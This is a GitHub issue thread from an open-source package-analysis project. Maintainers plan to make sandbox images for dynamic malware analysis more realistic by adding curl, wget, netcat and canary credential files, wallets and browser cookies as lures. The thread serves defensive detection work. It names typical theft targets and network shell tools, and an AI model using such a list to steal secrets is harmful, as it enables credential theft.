Make the images used for dynamic analysis more representative of a standard Linux install

ossf / package-analysis

Open Source Package Analysis

Apache License 2.0

737 stars 51 forks source link

Make the images used for dynamic analysis more representative of a standard Linux install #146

Open calebbrown opened 3 years ago

calebbrown commented 3 years ago

Currently the base images used are the *-slim variants.

To ensure we capture common attack scenarios the base images should include things like:

curl, wget
git, mercurial
git config
dummy key files (ssh, aws, etc - bonus points if these are canarytokens.org or similar)

Other nice-to-haves might be:

a common cryptowallet
browser profile (e.g. session cookies)

oliverchang commented 3 years ago

Yes!

One technical issue I've encountered though is that storing large images in the base analysis image is really slow. We might need to find a better way to run these analysis images.

calebbrown commented 3 years ago

There are a few options here:

pull all the images when each worker pod starts
pull the images the first time they are needed (this is basically how it works now, but it happens during the podman run step)
build analysis images for each ecosystem with the sandbox image baked in, and have different k8s clusters for different ecosystems.

My preference would be for 2 as it trades-off the startup latency against the ability to pull in larger images.

oliverchang commented 3 years ago

I agree 2 would be ideal, but I noticed a lot of slowness with pulling on demand that we'd have to solve (taking several minutes even with the current size of images). Maybe the filesystem overlay or some other configuration is not set up optimally for this.

naveensrinivasan commented 3 years ago

Wont this help https://cloud.google.com/blog/products/containers-kubernetes/introducing-container-image-streaming-in-gke

oliverchang commented 3 years ago

Thanks @naveensrinivasan that looks interesting, but I'm unsure of how easily this works with our setup and nested containers..

To make 2) work, one thing to explore might be to set up a persistent SSD storage for our workers (and mount that into /var/lib/containers or wherever podman stores images) which might make pulling both faster and allow caching.

oliverchang commented 3 years ago

Some packages also fail to install properly because our image is too minimal.

e.g. @brixel/brixel-components@2.6.57 requires git:

Error
2021-11-25 00:04:16.180 GMTnpm ERR! code ENOENT
Error
2021-11-25 00:04:16.180 GMTnpm ERR! syscall spawn git
Error
2021-11-25 00:04:16.180 GMTnpm ERR! path git
Error
2021-11-25 00:04:16.180 GMTnpm ERR! errno -2
Error
2021-11-25 00:04:16.180 GMTnpm ERR! enoent spawn git ENOENT
Error
2021-11-25 00:04:16.180 GMTnpm ERR! enoent This is related to npm not being able to find a file.
Error
2021-11-25 00:04:16.180 GMTnpm ERR! enoent

calebbrown commented 2 years ago

Now available in sandbox images:

git
curl
wget

maxfisher-g commented 1 year ago

There is also sudo now in all sandbox images #395

calebbrown commented 1 year ago

It is unclear when this issue can be marked as complete.

At the very least the images should not be "slim" variants, but more full ubuntu server or workstation variants.

maxfisher-g commented 1 year ago

Some other small things to add - netcat, ip tools.

Need someone to make a list based on examining commands executed by packages and and what programs they try to access